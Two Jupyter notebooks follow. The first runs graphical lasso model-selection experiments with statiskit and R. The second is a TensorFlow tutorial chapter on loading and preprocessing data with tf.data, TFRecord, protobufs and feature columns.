```
| github_jupyter |
```
import matplotlib
%matplotlib nbagg
from matplotlib import pyplot
from statiskit import (linalg,
core,
pgm)
import math
import os
%reload_ext rpy2.ipython
%%R
library(glasso)
if not 'K' in os.environ:
os.environ['K'] = str(10)
K = int(os.environ.get('K'))
simulation = !jupyter nbconvert --ExecutePreprocessor.timeout=3600 --to notebook --execute sampling.ipynb --output sampling.ipynb
data = core.read_csv('data.csv')
if not 'LASSO_PATH' in os.environ:
os.environ['LASSO_PATH'] = "linear"
LASSO_PATH = os.environ.get('LASSO_PATH')
if not 'PENALTIES' in os.environ:
os.environ['PENALTIES'] = str(K)
PENALTIES = int(os.environ.get('PENALTIES'))
import itertools
import numpy
import math
S = data.covariance
for u in range(K):
S[u, u] = float("nan")
for v in range(u):
S[u, v] = math.fabs(S[u, v])
S[v, u] = S[u, v]
rhos = core.from_list(list(itertools.chain(*S.to_list())))
if LASSO_PATH == 'linear':
rhos = numpy.linspace(rhos.min.value, rhos.max.value, PENALTIES).tolist()
elif LASSO_PATH == 'empirical':
freq = core.frequency_estimation(data=rhos)
rhos = [freq.estimated.quantile(rho) for rho in numpy.linspace(0., 1., PENALTIES)]
else:
raise ValueError("'LASSO' environment variable")
%R data = read.csv('data.csv', header = F, sep="")
%R -n S = cov(data)
graphs = []
for rho in rhos:
%R -i rho
theta = %R glasso(S, rho=rho)$wi
graphs.append(pgm.UndirectedGraph(linalg.Matrix(theta)))
graphs = sorted(graphs, key = lambda graph: graph.nb_edges)
graphs = [graphs[0]] + [graphs[index] for index in range(1, len(graphs)) if not graphs[index - 1].nb_edges == graphs[index].nb_edges]
logLs = []
for graph in graphs:
passed = False
for algo in ['NR', 'sGA', 'GA']:
try:
mle = pgm.graphical_gaussian_estimation(algo=algo,
data=data,
graph=graph)
logLs.append(2 * mle.estimated.loglikelihood(data))
except:
pass
else:
passed = True
break
if not passed:
logLs.append(float("nan"))
graphs, logLs = zip(*[(graph, logL) for graph, logL in zip(graphs, logLs) if not math.isnan(logL)])
dimensions = [graph.nb_edges for graph in graphs]
total = data.total
BICs = [logL - 2 * dimension * math.log(total) for logL, dimension in zip(logLs, dimensions)]
BIC = BICs.index(max(BICs))
AICs = [logL - 2 * dimension for logL, dimension in zip(logLs, dimensions)]
AIC = AICs.index(max(AICs))
SHs = core.SlopeHeuristic(dimensions, logLs)
SH = SHs.selector(SHs)
fig = pyplot.figure()
axes0, axes1 = SHs.plot()
axes0.plot(BICs)
axes0.plot(AICs)
pyplot.tight_layout()
fig = pyplot.figure()
truth = pgm.read_gml('graph.gml')
axes = truth.to_matrix().plot(axes = fig.add_subplot(141))
axes.set_title('$G$')
index = 2
for criterion, graph in zip(['BIC', 'AIC', 'SH'], [BIC, AIC, SH]):
axes = graphs[graph].to_matrix().plot(axes = fig.add_subplot(1, 4, index))
axes.set_title('$\widehat{G}_{' + criterion + '}$')
index += 1
pyplot.tight_layout()
def TP(truth, predicted):
tp = 0
for u in range(truth.nb_vertices):
for v in range(u):
if truth.has_edge(u, v) and predicted.has_edge(u, v):
tp += 1
return tp
def TN(truth, predicted):
tn = 0
for u in range(truth.nb_vertices):
for v in range(u):
if not truth.has_edge(u, v) and not predicted.has_edge(u, v):
tn += 1
return tn
def FP(truth, predicted):
fp = 0
for u in range(truth.nb_vertices):
for v in range(u):
if not truth.has_edge(u, v) and predicted.has_edge(u, v):
fp += 1
return fp
def FN(truth, predicted):
fn = 0
for u in range(truth.nb_vertices):
for v in range(u):
if truth.has_edge(u, v) and not predicted.has_edge(u, v):
fn += 1
return fn
import hashlib
from datetime import datetime
identifier = hashlib.md5(str(datetime.today())).hexdigest()
if not os.path.exists('paths.csv'):
with open('paths.csv', 'w') as filehandler:
filehandler.write('identifier,dimension,path,TP,TN,FP,FN\n')
with open('paths.csv', 'a') as filehandler:
for graph in graphs:
tp, tn, fp, fn = TP(truth, graph), TN(truth, graph), FP(truth, graph), FN(truth, graph)
filehandler.write(','.join([identifier, str(K), str(LASSO_PATH), str(tp), str(tn), str(fp), str(fn)]) + '\n')
if not os.path.exists('criteria.csv'):
with open('criteria.csv', 'w') as filehandler:
filehandler.write('identifier,dimension,criterion,TP,TN,FP,FN\n')
with open('criteria.csv', 'a') as filehandler:
for criterion, graph in zip(['BIC', 'AIC', 'SH'], [BIC, AIC, SH]):
tp, tn, fp, fn = TP(truth, graphs[graph]), TN(truth, graphs[graph]), FP(truth, graphs[graph]), FN(truth, graphs[graph])
filehandler.write(','.join([identifier, str(K), str(criterion), str(tp), str(tn), str(fp), str(fn)]) + '\n')
os.remove('graph.gml')
os.remove('data.csv')
```
| github_jupyter |
**Chapter 13 – Loading and Preprocessing Data with TensorFlow**
_This notebook contains all the sample code and solutions to the exercises in chapter 13._
<table align="left">
<td>
<a href="https://colab.research.google.com/github/ageron/handson-ml2/blob/master/13_loading_and_preprocessing_data.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
</td>
<td>
<a target="_blank" href="https://kaggle.com/kernels/welcome?src=https://github.com/ageron/handson-ml2/blob/add-kaggle-badge/13_loading_and_preprocessing_data.ipynb"><img src="https://kaggle.com/static/images/open-in-kaggle.svg" /></a>
</td>
</table>
# Setup
Đầu tiên hãy nhập một vài mô-đun thông dụng, đảm bảo rằng Matplotlib sẽ vẽ đồ thị ngay trong notebook, và chuẩn bị một hàm để lưu đồ thị. Ta cũng kiểm tra xem Python phiên bản từ 3.5 trở lên đã được cài đặt hay chưa (mặc dù Python 2.x vẫn có thể hoạt động, phiên bản này đã bị deprecated nên chúng tôi rất khuyến khích việc sử dụng Python 3), cũng như Scikit-Learn ≥ 0.20.
```
# Python ≥3.5 is required
import sys
assert sys.version_info >= (3, 5)
# Is this notebook running on Colab or Kaggle?
IS_COLAB = "google.colab" in sys.modules
IS_KAGGLE = "kaggle_secrets" in sys.modules
if IS_COLAB or IS_KAGGLE:
!pip install -q -U tfx==0.21.2
print("You can safely ignore the package incompatibility errors.")
# Scikit-Learn ≥0.20 is required
import sklearn
assert sklearn.__version__ >= "0.20"
# TensorFlow ≥2.0 is required
import tensorflow as tf
from tensorflow import keras
assert tf.__version__ >= "2.0"
# Common imports
import numpy as np
import os
# to make this notebook's output stable across runs
np.random.seed(42)
# To plot pretty figures
%matplotlib inline
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rc('axes', labelsize=14)
mpl.rc('xtick', labelsize=12)
mpl.rc('ytick', labelsize=12)
# Where to save the figures
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "data"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
os.makedirs(IMAGES_PATH, exist_ok=True)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
print("Saving figure", fig_id)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
```
## Datasets
```
X = tf.range(10)
dataset = tf.data.Dataset.from_tensor_slices(X)
dataset
```
Equivalently:
```
dataset = tf.data.Dataset.range(10)
for item in dataset:
print(item)
dataset = dataset.repeat(3).batch(7)
for item in dataset:
print(item)
dataset = dataset.map(lambda x: x * 2)
for item in dataset:
print(item)
#dataset = dataset.apply(tf.data.experimental.unbatch()) # Now deprecated
dataset = dataset.unbatch()
dataset = dataset.filter(lambda x: x < 10) # keep only items < 10
for item in dataset.take(3):
print(item)
tf.random.set_seed(42)
dataset = tf.data.Dataset.range(10).repeat(3)
dataset = dataset.shuffle(buffer_size=3, seed=42).batch(7)
for item in dataset:
print(item)
```
## Split the California dataset to multiple CSV files
Let's start by loading and preparing the California housing dataset. We first load it, then split it into a training set, a validation set and a test set, and finally we scale it:
```
from sklearn.datasets import fetch_california_housing
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
housing = fetch_california_housing()
X_train_full, X_test, y_train_full, y_test = train_test_split(
housing.data, housing.target.reshape(-1, 1), random_state=42)
X_train, X_valid, y_train, y_valid = train_test_split(
X_train_full, y_train_full, random_state=42)
scaler = StandardScaler()
scaler.fit(X_train)
X_mean = scaler.mean_
X_std = scaler.scale_
```
For a very large dataset that does not fit in memory, you will typically want to split it into many files first, then have TensorFlow read these files in parallel. To demonstrate this, let's start by splitting the housing dataset and save it to 20 CSV files:
```
def save_to_multiple_csv_files(data, name_prefix, header=None, n_parts=10):
housing_dir = os.path.join("datasets", "housing")
os.makedirs(housing_dir, exist_ok=True)
path_format = os.path.join(housing_dir, "my_{}_{:02d}.csv")
filepaths = []
m = len(data)
for file_idx, row_indices in enumerate(np.array_split(np.arange(m), n_parts)):
part_csv = path_format.format(name_prefix, file_idx)
filepaths.append(part_csv)
with open(part_csv, "wt", encoding="utf-8") as f:
if header is not None:
f.write(header)
f.write("\n")
for row_idx in row_indices:
f.write(",".join([repr(col) for col in data[row_idx]]))
f.write("\n")
return filepaths
train_data = np.c_[X_train, y_train]
valid_data = np.c_[X_valid, y_valid]
test_data = np.c_[X_test, y_test]
header_cols = housing.feature_names + ["MedianHouseValue"]
header = ",".join(header_cols)
train_filepaths = save_to_multiple_csv_files(train_data, "train", header, n_parts=20)
valid_filepaths = save_to_multiple_csv_files(valid_data, "valid", header, n_parts=10)
test_filepaths = save_to_multiple_csv_files(test_data, "test", header, n_parts=10)
```
Okay, now let's take a peek at the first few lines of one of these CSV files:
```
import pandas as pd
pd.read_csv(train_filepaths[0]).head()
```
Or in text mode:
```
with open(train_filepaths[0]) as f:
for i in range(5):
print(f.readline(), end="")
train_filepaths
```
## Building an Input Pipeline
```
filepath_dataset = tf.data.Dataset.list_files(train_filepaths, seed=42)
for filepath in filepath_dataset:
print(filepath)
n_readers = 5
dataset = filepath_dataset.interleave(
lambda filepath: tf.data.TextLineDataset(filepath).skip(1),
cycle_length=n_readers)
for line in dataset.take(5):
print(line.numpy())
```
Notice that field 4 is interpreted as a string.
```
record_defaults=[0, np.nan, tf.constant(np.nan, dtype=tf.float64), "Hello", tf.constant([])]
parsed_fields = tf.io.decode_csv('1,2,3,4,5', record_defaults)
parsed_fields
```
Notice that all missing fields are replaced with their default value, when provided:
```
parsed_fields = tf.io.decode_csv(',,,,5', record_defaults)
parsed_fields
```
The 5th field is compulsory (since we provided `tf.constant([])` as the "default value"), so we get an exception if we do not provide it:
```
try:
parsed_fields = tf.io.decode_csv(',,,,', record_defaults)
except tf.errors.InvalidArgumentError as ex:
print(ex)
```
The number of fields should match exactly the number of fields in the `record_defaults`:
```
try:
parsed_fields = tf.io.decode_csv('1,2,3,4,5,6,7', record_defaults)
except tf.errors.InvalidArgumentError as ex:
print(ex)
n_inputs = 8 # X_train.shape[-1]
@tf.function
def preprocess(line):
defs = [0.] * n_inputs + [tf.constant([], dtype=tf.float32)]
fields = tf.io.decode_csv(line, record_defaults=defs)
x = tf.stack(fields[:-1])
y = tf.stack(fields[-1:])
return (x - X_mean) / X_std, y
preprocess(b'4.2083,44.0,5.3232,0.9171,846.0,2.3370,37.47,-122.2,2.782')
def csv_reader_dataset(filepaths, repeat=1, n_readers=5,
n_read_threads=None, shuffle_buffer_size=10000,
n_parse_threads=5, batch_size=32):
dataset = tf.data.Dataset.list_files(filepaths).repeat(repeat)
dataset = dataset.interleave(
lambda filepath: tf.data.TextLineDataset(filepath).skip(1),
cycle_length=n_readers, num_parallel_calls=n_read_threads)
dataset = dataset.shuffle(shuffle_buffer_size)
dataset = dataset.map(preprocess, num_parallel_calls=n_parse_threads)
dataset = dataset.batch(batch_size)
return dataset.prefetch(1)
tf.random.set_seed(42)
train_set = csv_reader_dataset(train_filepaths, batch_size=3)
for X_batch, y_batch in train_set.take(2):
print("X =", X_batch)
print("y =", y_batch)
print()
train_set = csv_reader_dataset(train_filepaths, repeat=None)
valid_set = csv_reader_dataset(valid_filepaths)
test_set = csv_reader_dataset(test_filepaths)
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
model = keras.models.Sequential([
keras.layers.Dense(30, activation="relu", input_shape=X_train.shape[1:]),
keras.layers.Dense(1),
])
model.compile(loss="mse", optimizer=keras.optimizers.SGD(learning_rate=1e-3))
batch_size = 32
model.fit(train_set, steps_per_epoch=len(X_train) // batch_size, epochs=10,
validation_data=valid_set)
model.evaluate(test_set, steps=len(X_test) // batch_size)
new_set = test_set.map(lambda X, y: X) # we could instead just pass test_set, Keras would ignore the labels
X_new = X_test
model.predict(new_set, steps=len(X_new) // batch_size)
optimizer = keras.optimizers.Nadam(learning_rate=0.01)
loss_fn = keras.losses.mean_squared_error
n_epochs = 5
batch_size = 32
n_steps_per_epoch = len(X_train) // batch_size
total_steps = n_epochs * n_steps_per_epoch
global_step = 0
for X_batch, y_batch in train_set.take(total_steps):
global_step += 1
print("\rGlobal step {}/{}".format(global_step, total_steps), end="")
with tf.GradientTape() as tape:
y_pred = model(X_batch)
main_loss = tf.reduce_mean(loss_fn(y_batch, y_pred))
loss = tf.add_n([main_loss] + model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
optimizer = keras.optimizers.Nadam(learning_rate=0.01)
loss_fn = keras.losses.mean_squared_error
@tf.function
def train(model, n_epochs, batch_size=32,
n_readers=5, n_read_threads=5, shuffle_buffer_size=10000, n_parse_threads=5):
train_set = csv_reader_dataset(train_filepaths, repeat=n_epochs, n_readers=n_readers,
n_read_threads=n_read_threads, shuffle_buffer_size=shuffle_buffer_size,
n_parse_threads=n_parse_threads, batch_size=batch_size)
for X_batch, y_batch in train_set:
with tf.GradientTape() as tape:
y_pred = model(X_batch)
main_loss = tf.reduce_mean(loss_fn(y_batch, y_pred))
loss = tf.add_n([main_loss] + model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train(model, 5)
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
optimizer = keras.optimizers.Nadam(learning_rate=0.01)
loss_fn = keras.losses.mean_squared_error
@tf.function
def train(model, n_epochs, batch_size=32,
n_readers=5, n_read_threads=5, shuffle_buffer_size=10000, n_parse_threads=5):
train_set = csv_reader_dataset(train_filepaths, repeat=n_epochs, n_readers=n_readers,
n_read_threads=n_read_threads, shuffle_buffer_size=shuffle_buffer_size,
n_parse_threads=n_parse_threads, batch_size=batch_size)
n_steps_per_epoch = len(X_train) // batch_size
total_steps = n_epochs * n_steps_per_epoch
global_step = 0
for X_batch, y_batch in train_set.take(total_steps):
global_step += 1
if tf.equal(global_step % 100, 0):
tf.print("\rGlobal step", global_step, "/", total_steps)
with tf.GradientTape() as tape:
y_pred = model(X_batch)
main_loss = tf.reduce_mean(loss_fn(y_batch, y_pred))
loss = tf.add_n([main_loss] + model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train(model, 5)
```
Here is a short description of each method in the `Dataset` class:
```
for m in dir(tf.data.Dataset):
if not (m.startswith("_") or m.endswith("_")):
func = getattr(tf.data.Dataset, m)
if hasattr(func, "__doc__"):
print("● {:21s}{}".format(m + "()", func.__doc__.split("\n")[0]))
```
## The `TFRecord` binary format
A TFRecord file is just a list of binary records. You can create one using a `tf.io.TFRecordWriter`:
```
with tf.io.TFRecordWriter("my_data.tfrecord") as f:
f.write(b"This is the first record")
f.write(b"And this is the second record")
```
And you can read it using a `tf.data.TFRecordDataset`:
```
filepaths = ["my_data.tfrecord"]
dataset = tf.data.TFRecordDataset(filepaths)
for item in dataset:
print(item)
```
You can read multiple TFRecord files with just one `TFRecordDataset`. By default it will read them one at a time, but if you set `num_parallel_reads=3`, it will read 3 at a time in parallel and interleave their records:
```
filepaths = ["my_test_{}.tfrecord".format(i) for i in range(5)]
for i, filepath in enumerate(filepaths):
with tf.io.TFRecordWriter(filepath) as f:
for j in range(3):
f.write("File {} record {}".format(i, j).encode("utf-8"))
dataset = tf.data.TFRecordDataset(filepaths, num_parallel_reads=3)
for item in dataset:
print(item)
options = tf.io.TFRecordOptions(compression_type="GZIP")
with tf.io.TFRecordWriter("my_compressed.tfrecord", options) as f:
f.write(b"This is the first record")
f.write(b"And this is the second record")
dataset = tf.data.TFRecordDataset(["my_compressed.tfrecord"],
compression_type="GZIP")
for item in dataset:
print(item)
```
### A Brief Intro to Protocol Buffers
For this section you need to [install protobuf](https://developers.google.com/protocol-buffers/docs/downloads). In general you will not have to do so when using TensorFlow, as it comes with functions to create and parse protocol buffers of type `tf.train.Example`, which are generally sufficient. However, in this section we will learn about protocol buffers by creating our own simple protobuf definition, so we need the protobuf compiler (`protoc`): we will use it to compile the protobuf definition to a Python module that we can then use in our code.
First let's write a simple protobuf definition:
```
%%writefile person.proto
syntax = "proto3";
message Person {
string name = 1;
int32 id = 2;
repeated string email = 3;
}
```
And let's compile it (the `--descriptor_set_out` and `--include_imports` options are only required for the `tf.io.decode_proto()` example below):
```
!protoc person.proto --python_out=. --descriptor_set_out=person.desc --include_imports
!ls person*
from person_pb2 import Person
person = Person(name="Al", id=123, email=["a@b.com"]) # create a Person
print(person) # display the Person
person.name # read a field
person.name = "Alice" # modify a field
person.email[0] # repeated fields can be accessed like arrays
person.email.append("c@d.com") # add an email address
s = person.SerializeToString() # serialize to a byte string
s
person2 = Person() # create a new Person
person2.ParseFromString(s) # parse the byte string (27 bytes)
person == person2 # now they are equal
```
#### Custom protobuf
In rare cases, you may want to parse a custom protobuf (like the one we just created) in TensorFlow. For this you can use the `tf.io.decode_proto()` function:
```
person_tf = tf.io.decode_proto(
bytes=s,
message_type="Person",
field_names=["name", "id", "email"],
output_types=[tf.string, tf.int32, tf.string],
descriptor_source="person.desc")
person_tf.values
```
For more details, see the [`tf.io.decode_proto()`](https://www.tensorflow.org/api_docs/python/tf/io/decode_proto) documentation.
### TensorFlow Protobufs
Here is the definition of the tf.train.Example protobuf:
```proto
syntax = "proto3";
message BytesList { repeated bytes value = 1; }
message FloatList { repeated float value = 1 [packed = true]; }
message Int64List { repeated int64 value = 1 [packed = true]; }
message Feature {
oneof kind {
BytesList bytes_list = 1;
FloatList float_list = 2;
Int64List int64_list = 3;
}
};
message Features { map<string, Feature> feature = 1; };
message Example { Features features = 1; };
```
**Warning**: in TensorFlow 2.0 and 2.1, there was a bug preventing `from tensorflow.train import X` so we work around it by writing `X = tf.train.X`. See https://github.com/tensorflow/tensorflow/issues/33289 for more details.
```
#from tensorflow.train import BytesList, FloatList, Int64List
#from tensorflow.train import Feature, Features, Example
BytesList = tf.train.BytesList
FloatList = tf.train.FloatList
Int64List = tf.train.Int64List
Feature = tf.train.Feature
Features = tf.train.Features
Example = tf.train.Example
person_example = Example(
features=Features(
feature={
"name": Feature(bytes_list=BytesList(value=[b"Alice"])),
"id": Feature(int64_list=Int64List(value=[123])),
"emails": Feature(bytes_list=BytesList(value=[b"a@b.com", b"c@d.com"]))
}))
with tf.io.TFRecordWriter("my_contacts.tfrecord") as f:
f.write(person_example.SerializeToString())
feature_description = {
"name": tf.io.FixedLenFeature([], tf.string, default_value=""),
"id": tf.io.FixedLenFeature([], tf.int64, default_value=0),
"emails": tf.io.VarLenFeature(tf.string),
}
for serialized_example in tf.data.TFRecordDataset(["my_contacts.tfrecord"]):
parsed_example = tf.io.parse_single_example(serialized_example,
feature_description)
parsed_example
parsed_example
parsed_example["emails"].values[0]
tf.sparse.to_dense(parsed_example["emails"], default_value=b"")
parsed_example["emails"].values
```
### Putting Images in TFRecords
```
from sklearn.datasets import load_sample_images
img = load_sample_images()["images"][0]
plt.imshow(img)
plt.axis("off")
plt.title("Original Image")
plt.show()
data = tf.io.encode_jpeg(img)
example_with_image = Example(features=Features(feature={
"image": Feature(bytes_list=BytesList(value=[data.numpy()]))}))
serialized_example = example_with_image.SerializeToString()
# then save to TFRecord
feature_description = { "image": tf.io.VarLenFeature(tf.string) }
example_with_image = tf.io.parse_single_example(serialized_example, feature_description)
decoded_img = tf.io.decode_jpeg(example_with_image["image"].values[0])
```
Or use `decode_image()` which supports BMP, GIF, JPEG and PNG formats:
```
decoded_img = tf.io.decode_image(example_with_image["image"].values[0])
plt.imshow(decoded_img)
plt.title("Decoded Image")
plt.axis("off")
plt.show()
```
### Putting Tensors and Sparse Tensors in TFRecords
Tensors can be serialized and parsed easily using `tf.io.serialize_tensor()` and `tf.io.parse_tensor()`:
```
t = tf.constant([[0., 1.], [2., 3.], [4., 5.]])
s = tf.io.serialize_tensor(t)
s
tf.io.parse_tensor(s, out_type=tf.float32)
serialized_sparse = tf.io.serialize_sparse(parsed_example["emails"])
serialized_sparse
BytesList(value=serialized_sparse.numpy())
dataset = tf.data.TFRecordDataset(["my_contacts.tfrecord"]).batch(10)
for serialized_examples in dataset:
parsed_examples = tf.io.parse_example(serialized_examples,
feature_description)
parsed_examples
```
## Handling Sequential Data Using `SequenceExample`
```proto
syntax = "proto3";
message FeatureList { repeated Feature feature = 1; };
message FeatureLists { map<string, FeatureList> feature_list = 1; };
message SequenceExample {
Features context = 1;
FeatureLists feature_lists = 2;
};
```
**Warning**: in TensorFlow 2.0 and 2.1, there was a bug preventing `from tensorflow.train import X` so we work around it by writing `X = tf.train.X`. See https://github.com/tensorflow/tensorflow/issues/33289 for more details.
```
#from tensorflow.train import FeatureList, FeatureLists, SequenceExample
FeatureList = tf.train.FeatureList
FeatureLists = tf.train.FeatureLists
SequenceExample = tf.train.SequenceExample
context = Features(feature={
"author_id": Feature(int64_list=Int64List(value=[123])),
"title": Feature(bytes_list=BytesList(value=[b"A", b"desert", b"place", b"."])),
"pub_date": Feature(int64_list=Int64List(value=[1623, 12, 25]))
})
content = [["When", "shall", "we", "three", "meet", "again", "?"],
["In", "thunder", ",", "lightning", ",", "or", "in", "rain", "?"]]
comments = [["When", "the", "hurlyburly", "'s", "done", "."],
["When", "the", "battle", "'s", "lost", "and", "won", "."]]
def words_to_feature(words):
return Feature(bytes_list=BytesList(value=[word.encode("utf-8")
for word in words]))
content_features = [words_to_feature(sentence) for sentence in content]
comments_features = [words_to_feature(comment) for comment in comments]
sequence_example = SequenceExample(
context=context,
feature_lists=FeatureLists(feature_list={
"content": FeatureList(feature=content_features),
"comments": FeatureList(feature=comments_features)
}))
sequence_example
serialized_sequence_example = sequence_example.SerializeToString()
context_feature_descriptions = {
"author_id": tf.io.FixedLenFeature([], tf.int64, default_value=0),
"title": tf.io.VarLenFeature(tf.string),
"pub_date": tf.io.FixedLenFeature([3], tf.int64, default_value=[0, 0, 0]),
}
sequence_feature_descriptions = {
"content": tf.io.VarLenFeature(tf.string),
"comments": tf.io.VarLenFeature(tf.string),
}
parsed_context, parsed_feature_lists = tf.io.parse_single_sequence_example(
serialized_sequence_example, context_feature_descriptions,
sequence_feature_descriptions)
parsed_context
parsed_context["title"].values
parsed_feature_lists
print(tf.RaggedTensor.from_sparse(parsed_feature_lists["content"]))
```
# The Features API
Let's use the variant of the California housing dataset that we used in Chapter 2, since it contains categorical features and missing values:
```
import os
import tarfile
import urllib.request
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml2/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
os.makedirs(housing_path, exist_ok=True)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
fetch_housing_data()
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
housing = load_housing_data()
housing.head()
housing_median_age = tf.feature_column.numeric_column("housing_median_age")
age_mean, age_std = X_mean[1], X_std[1] # The median age is column in 1
housing_median_age = tf.feature_column.numeric_column(
"housing_median_age", normalizer_fn=lambda x: (x - age_mean) / age_std)
median_income = tf.feature_column.numeric_column("median_income")
bucketized_income = tf.feature_column.bucketized_column(
median_income, boundaries=[1.5, 3., 4.5, 6.])
bucketized_income
ocean_prox_vocab = ['<1H OCEAN', 'INLAND', 'ISLAND', 'NEAR BAY', 'NEAR OCEAN']
ocean_proximity = tf.feature_column.categorical_column_with_vocabulary_list(
"ocean_proximity", ocean_prox_vocab)
ocean_proximity
# Just an example, it's not used later on
city_hash = tf.feature_column.categorical_column_with_hash_bucket(
"city", hash_bucket_size=1000)
city_hash
bucketized_age = tf.feature_column.bucketized_column(
housing_median_age, boundaries=[-1., -0.5, 0., 0.5, 1.]) # age was scaled
age_and_ocean_proximity = tf.feature_column.crossed_column(
[bucketized_age, ocean_proximity], hash_bucket_size=100)
latitude = tf.feature_column.numeric_column("latitude")
longitude = tf.feature_column.numeric_column("longitude")
bucketized_latitude = tf.feature_column.bucketized_column(
latitude, boundaries=list(np.linspace(32., 42., 20 - 1)))
bucketized_longitude = tf.feature_column.bucketized_column(
longitude, boundaries=list(np.linspace(-125., -114., 20 - 1)))
location = tf.feature_column.crossed_column(
[bucketized_latitude, bucketized_longitude], hash_bucket_size=1000)
ocean_proximity_one_hot = tf.feature_column.indicator_column(ocean_proximity)
ocean_proximity_embed = tf.feature_column.embedding_column(ocean_proximity,
dimension=2)
```
## Using Feature Columns for Parsing
```
median_house_value = tf.feature_column.numeric_column("median_house_value")
columns = [housing_median_age, median_house_value]
feature_descriptions = tf.feature_column.make_parse_example_spec(columns)
feature_descriptions
with tf.io.TFRecordWriter("my_data_with_features.tfrecords") as f:
for x, y in zip(X_train[:, 1:2], y_train):
example = Example(features=Features(feature={
"housing_median_age": Feature(float_list=FloatList(value=[x])),
"median_house_value": Feature(float_list=FloatList(value=[y]))
}))
f.write(example.SerializeToString())
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
def parse_examples(serialized_examples):
examples = tf.io.parse_example(serialized_examples, feature_descriptions)
targets = examples.pop("median_house_value") # separate the targets
return examples, targets
batch_size = 32
dataset = tf.data.TFRecordDataset(["my_data_with_features.tfrecords"])
dataset = dataset.repeat().shuffle(10000).batch(batch_size).map(parse_examples)
```
**Warning**: the `DenseFeatures` layer currently does not work with the Functional API, see [TF issue #27416](https://github.com/tensorflow/tensorflow/issues/27416). Hopefully this will be resolved before the final release of TF 2.0.
```
columns_without_target = columns[:-1]
model = keras.models.Sequential([
keras.layers.DenseFeatures(feature_columns=columns_without_target),
keras.layers.Dense(1)
])
model.compile(loss="mse",
optimizer=keras.optimizers.SGD(learning_rate=1e-3),
metrics=["accuracy"])
model.fit(dataset, steps_per_epoch=len(X_train) // batch_size, epochs=5)
some_columns = [ocean_proximity_embed, bucketized_income]
dense_features = keras.layers.DenseFeatures(some_columns)
dense_features({
"ocean_proximity": [["NEAR OCEAN"], ["INLAND"], ["INLAND"]],
"median_income": [[3.], [7.2], [1.]]
})
```
# TF Transform
```
try:
import tensorflow_transform as tft
def preprocess(inputs): # inputs is a batch of input features
median_age = inputs["housing_median_age"]
ocean_proximity = inputs["ocean_proximity"]
standardized_age = tft.scale_to_z_score(median_age - tft.mean(median_age))
ocean_proximity_id = tft.compute_and_apply_vocabulary(ocean_proximity)
return {
"standardized_median_age": standardized_age,
"ocean_proximity_id": ocean_proximity_id
}
except ImportError:
print("TF Transform is not installed. Try running: pip3 install -U tensorflow-transform")
```
# TensorFlow Datasets
```
import tensorflow_datasets as tfds
datasets = tfds.load(name="mnist")
mnist_train, mnist_test = datasets["train"], datasets["test"]
print(tfds.list_builders())
plt.figure(figsize=(6,3))
mnist_train = mnist_train.repeat(5).batch(32).prefetch(1)
for item in mnist_train:
images = item["image"]
labels = item["label"]
for index in range(5):
plt.subplot(1, 5, index + 1)
image = images[index, ..., 0]
label = labels[index].numpy()
plt.imshow(image, cmap="binary")
plt.title(label)
plt.axis("off")
break # just showing part of the first batch
datasets = tfds.load(name="mnist")
mnist_train, mnist_test = datasets["train"], datasets["test"]
mnist_train = mnist_train.repeat(5).batch(32)
mnist_train = mnist_train.map(lambda items: (items["image"], items["label"]))
mnist_train = mnist_train.prefetch(1)
for images, labels in mnist_train.take(1):
print(images.shape)
print(labels.numpy())
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
datasets = tfds.load(name="mnist", batch_size=32, as_supervised=True)
mnist_train = datasets["train"].repeat().prefetch(1)
model = keras.models.Sequential([
keras.layers.Flatten(input_shape=[28, 28, 1]),
keras.layers.Lambda(lambda images: tf.cast(images, tf.float32)),
keras.layers.Dense(10, activation="softmax")])
model.compile(loss="sparse_categorical_crossentropy",
optimizer=keras.optimizers.SGD(learning_rate=1e-3),
metrics=["accuracy"])
model.fit(mnist_train, steps_per_epoch=60000 // 32, epochs=5)
```
# TensorFlow Hub
```
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
import tensorflow_hub as hub
hub_layer = hub.KerasLayer("https://tfhub.dev/google/nnlm-en-dim50/2",
output_shape=[50], input_shape=[], dtype=tf.string)
model = keras.Sequential()
model.add(hub_layer)
model.add(keras.layers.Dense(16, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.summary()
sentences = tf.constant(["It was a great movie", "The actors were amazing"])
embeddings = hub_layer(sentences)
embeddings
```
# Exercises
## 1. to 8.
See Appendix A
## 9.
### a.
_Exercise: Load the Fashion MNIST dataset (introduced in Chapter 10); split it into a training set, a validation set, and a test set; shuffle the training set; and save each dataset to multiple TFRecord files. Each record should be a serialized `Example` protobuf with two features: the serialized image (use `tf.io.serialize_tensor()` to serialize each image), and the label. Note: for large images, you could use `tf.io.encode_jpeg()` instead. This would save a lot of space, but it would lose a bit of image quality._
```
